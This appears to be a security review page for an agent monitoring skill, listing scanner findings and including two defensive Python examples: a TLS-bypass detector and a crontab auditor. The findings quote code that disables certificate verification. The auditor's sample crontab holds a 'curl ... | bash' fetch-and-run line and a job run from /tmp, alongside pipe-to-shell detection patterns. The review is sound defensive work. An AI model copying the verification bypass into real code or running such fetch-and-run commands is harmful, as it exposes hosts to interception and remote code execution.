AgentPulse Monitor

Security checks across malware telemetry and agentic risk

Overview

AgentPulse fits its stated monitoring purpose, but it carries deployment and transport-security risks that need review before it runs on real servers.

Review carefully before installing. Do not use this on production or sensitive hosts until TLS verification is enabled. Avoid the pipe-to-bash installer unless you can independently inspect and verify the downloaded script. If you proceed, protect the API key config, review any cron entries before installing them, and confirm what telemetry AgentPulse stores, for how long, and who can access it.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint Tracking: Direct Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
Findings (11)

Tainted flow: 'req' from os.environ.get (line 163, credential/environment) → urllib.request.urlopen (network output)

Critical
Category
Data Flow
Content
```python
    ctx.verify_mode = ssl.CERT_NONE

    try:
        with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as e:
        print(f"API error: {e.code} {e.reason}", file=sys.stderr)
```
Confidence
99% confidence
Finding
with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:

Lp3

Medium
Category
MCP Least Privilege
Confidence
83% confidence
Finding
The skill documents behavior that uses network access, shell execution, file reads, and likely environment/config handling, but it does not declare permissions accordingly. This reduces transparency and prevents users or policy engines from accurately assessing the trust boundary before installation.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
The documented behavior goes beyond simple monitoring: it installs persistent cron execution and collects potentially sensitive network state such as listening ports, and the code excerpt in the tainted-flow finding shows TLS verification disabled when reports are sent. Persistence plus infrastructure telemetry and weakened transport security materially increase risk, especially on production servers.

Description-Behavior Mismatch

Medium
Confidence
89% confidence
Finding
The file installs recurring cron jobs, creating persistence on the host beyond one-shot monitoring. In an agent skill context, persistence mechanisms are more sensitive because they change host execution state and can continue running without further user interaction.

Context-Inappropriate Capability

High
Confidence
100% confidence
Finding
TLS certificate verification is explicitly disabled, which defeats HTTPS authenticity and confidentiality guarantees. Any machine-in-the-middle attacker can impersonate the API server, capture credentials, and tamper with telemetry or responses, making this especially dangerous for an infrastructure-monitoring agent.
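The excerpt in the tainted-flow finding and this finding both come down to one line, `ctx.verify_mode = ssl.CERT_NONE`. The block below is an added example written for this report, not code from the scanned skill: a small AST-based check that finds the constructs Python code uses to switch off certificate or hostname verification (the page's pattern plus `check_hostname = False`, `ssl._create_unverified_context()` and the requests-style `verify=False`), run over a constructed snippet shaped like the excerpt, beside the verifying context that should replace it. The `cafile` parameter is an assumption for deployments that front the API with a private CA.

```python
"""Static check for TLS-verification bypasses in Python source, plus the
hardened context that should replace them.

Added example for this report; not code from the scanned skill. The sample
source below is constructed to mirror the shape of the flagged excerpt."""
import ast
import ssl
from typing import List, Optional, Tuple

# Constructed sample; not the skill's real file. Line numbers reported by
# find_tls_bypass() are relative to this string (line 1 is the blank line).
SAMPLE_SOURCE = """
import ssl, urllib.request
def send_report(req):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return resp.status == 200
"""


def _is_attr(node: ast.AST, name: str) -> bool:
    return isinstance(node, ast.Attribute) and node.attr == name


def _is_false(node: ast.AST) -> bool:
    return isinstance(node, ast.Constant) and node.value is False


def find_tls_bypass(source: str) -> List[Tuple[int, str]]:
    """Return (line, description) for constructs that disable certificate or
    hostname verification: ``x.verify_mode = ssl.CERT_NONE``,
    ``x.check_hostname = False``, ``ssl._create_unverified_context()`` and the
    requests-style ``verify=False`` keyword."""
    hits: List[Tuple[int, str]] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if _is_attr(target, "verify_mode") and _is_attr(node.value, "CERT_NONE"):
                    hits.append((node.lineno, "verify_mode set to ssl.CERT_NONE"))
                elif _is_attr(target, "check_hostname") and _is_false(node.value):
                    hits.append((node.lineno, "check_hostname disabled"))
        elif isinstance(node, ast.Call):
            if _is_attr(node.func, "_create_unverified_context"):
                hits.append((node.lineno, "ssl._create_unverified_context() used"))
            for kw in node.keywords:
                if kw.arg == "verify" and _is_false(kw.value):
                    hits.append((node.lineno, "verify=False passed to a network call"))
    return sorted(hits)


def hardened_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Context that verifies the chain and the hostname. ``cafile`` is an
    assumed knob for deployments that front the API with a private CA; leave
    it None to trust the system store."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_verified(ctx: ssl.SSLContext) -> bool:
    """Guard to run before urlopen(): refuse to send the API key over an
    unverified channel instead of silently falling back."""
    return bool(ctx.check_hostname) and ctx.verify_mode == ssl.CERT_REQUIRED


if __name__ == "__main__":
    for line, msg in find_tls_bypass(SAMPLE_SOURCE):
        print(f"line {line}: {msg}")
    print("hardened context verifies:", context_is_verified(hardened_context()))
```

Run `find_tls_bypass()` over the skill's source before installing; any hit in the function that sends the API key is disqualifying until the context is replaced with one that `context_is_verified()` accepts. The AST walk is deliberately shallow: it catches the literal patterns, not a flag threaded through a variable, so treat an empty result as "nothing obvious", not as a clean bill.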

Missing User Warnings

Medium
Confidence
97% confidence
Finding
Piping a remote script directly into bash for system-level installation is dangerous because users cannot inspect what will run, and any compromise of the remote host or delivery path can lead to immediate code execution. In the context of a monitoring agent intended for servers, this can yield full host compromise and persistence.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The skill advertises broad metrics collection, history storage, alerting, and remediation through a cloud API without clearly warning users what infrastructure data leaves the host. For production systems, telemetry such as hostnames, process/service state, port exposure, and usage patterns can be sensitive and useful to attackers if mishandled.

Natural-Language Policy Violations

Medium
Confidence
80% confidence
Finding
The manifest explicitly advertises "auto-remediation" without documenting any user approval, safeguards, or opt-in boundaries. In an infrastructure monitoring skill, automatic remediation can trigger service changes, restarts, configuration edits, or other operational actions, creating meaningful risk if users invoke it expecting passive monitoring only.

Missing User Warnings

Medium
Confidence
84% confidence
Finding
The full report collects and transmits detailed host telemetry, including process counts, listening ports, uptime, service state, and system resource data, without any user-facing disclosure at runtime. In infrastructure environments, this metadata can materially aid host profiling and attack planning if exposed or sent to an unexpected endpoint.

Missing User Warnings

Medium
Confidence
87% confidence
Finding
The `--install` path modifies the user's crontab immediately and silently, without an interactive prompt or explicit acknowledgement of the resulting persistence. In agent software, silent scheduling changes increase operational risk and can surprise users or administrators.
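The Overview asks reviewers to look at any cron entries before they are installed. The block below is an added example for this report, not AgentPulse's code and not its real cron lines: it diffs a current crontab against a proposed one and flags the patterns that matter for a scheduled agent, namely a remote script piped into a shell and executables or scripts loaded from world-writable or relative paths. The workflow it assumes is to capture `crontab -l` before running the installer and to obtain the entries the installer intends to add from its documentation or a dry run; both crontab texts are constructed.

```python
"""Audit crontab entries a monitoring installer wants to add, before letting
it write them.

Added example for this report; not AgentPulse's code or its real cron lines.
Assumed workflow: capture `crontab -l` before running the installer, obtain
the entries it intends to add, and feed both texts to new_entries() and
audit_crontab()."""
import re
import shlex
from typing import List, Optional, Tuple

# Constructed sample of an existing and a proposed crontab. Line numbers in
# the audit output are relative to PROPOSED_CRONTAB.
CURRENT_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/sbin/logrotate-all
"""
PROPOSED_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/sbin/logrotate-all
*/5 * * * * /usr/local/bin/agent-report --full >/dev/null 2>&1
@reboot curl -fsSL https://example.invalid/install.sh | bash
0 * * * * cd /tmp && ./update.sh
@hourly python3 /opt/agent/collect.py
"""

# `curl ... | bash`, `wget -O- ... | sudo sh`, and similar.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
FETCHERS = ("curl", "wget")
# Executables in world-writable or relative locations can be swapped by any
# local user between the review and the next scheduled run.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "./")
INTERPRETERS = ("python", "python3", "sh", "bash", "perl")


def split_entry(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a crontab line; None for comments,
    blank lines and VAR=value assignments."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
        return None
    if line.startswith("@"):                  # @reboot, @hourly, ...
        schedule, _, command = line.partition(" ")
        return schedule, command.strip()
    fields = line.split(None, 5)               # five time fields + command
    if len(fields) < 6:
        return None
    return " ".join(fields[:5]), fields[5]


def audit_command(command: str) -> List[str]:
    issues: List[str] = []
    if PIPE_TO_SHELL.search(command) and any(f in command for f in FETCHERS):
        issues.append("fetches a remote script and pipes it straight into a shell")
    for segment in re.split(r"\s*(?:&&|\|\||;)\s*", command):
        try:
            argv = shlex.split(segment)
        except ValueError:
            issues.append(f"unparseable segment: {segment!r}")
            continue
        if not argv:
            continue
        exe = argv[0]
        if exe.startswith(UNTRUSTED_PREFIXES):
            issues.append(f"runs an executable from an untrusted path: {exe}")
        elif (exe.rsplit("/", 1)[-1] in INTERPRETERS and len(argv) > 1
                and argv[1].startswith(UNTRUSTED_PREFIXES)):
            issues.append(f"interpreter loads a script from an untrusted path: {argv[1]}")
    return issues


def new_entries(current: str, proposed: str) -> List[str]:
    """Entries present in the proposed crontab but absent from the current one."""
    have = {e for e in (split_entry(l) for l in current.splitlines()) if e}
    return [l for l in proposed.splitlines()
            if (e := split_entry(l)) and e not in have]


def audit_crontab(text: str) -> List[Tuple[int, str, List[str]]]:
    """(line number, command, issues) for every entry with at least one issue."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        entry = split_entry(line)
        if entry is None:
            continue
        issues = audit_command(entry[1])
        if issues:
            findings.append((lineno, entry[1], issues))
    return findings


if __name__ == "__main__":
    for line in new_entries(CURRENT_CRONTAB, PROPOSED_CRONTAB):
        print("would add:", line)
    for lineno, command, issues in audit_crontab(PROPOSED_CRONTAB):
        print(f"line {lineno}: {command}")
        for issue in issues:
            print("   -", issue)
```

On the constructed input, `new_entries()` lists the four lines the installer would add and `audit_crontab()` flags two of them: the `curl ... | bash` entry and the job that runs a script out of `/tmp`. An entry that passes these checks still deserves a look at what the command does with the API key config and where its output goes, which no line-level check can decide.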

External Script Fetching

High
Category
Supply Chain
Content
### 1. Register Your Server

```bash
curl -X POST https://api.agentpulse.io/v1/servers \
  -H "Content-Type: application/json" \
  -d '{"hostname": "my-server", "plan": "starter"}'
```
Confidence
95% confidence
Finding
```bash
curl -X POST https://api.agentpulse.io/v1/servers \
  -H "Content-Type: application/json" \
  -d '{"hostname": "my-server", "plan": "starter"}'
```
Save the returned `server_id` and `api_key`.

### 2

VirusTotal

63/63 vendors flagged this skill as clean.
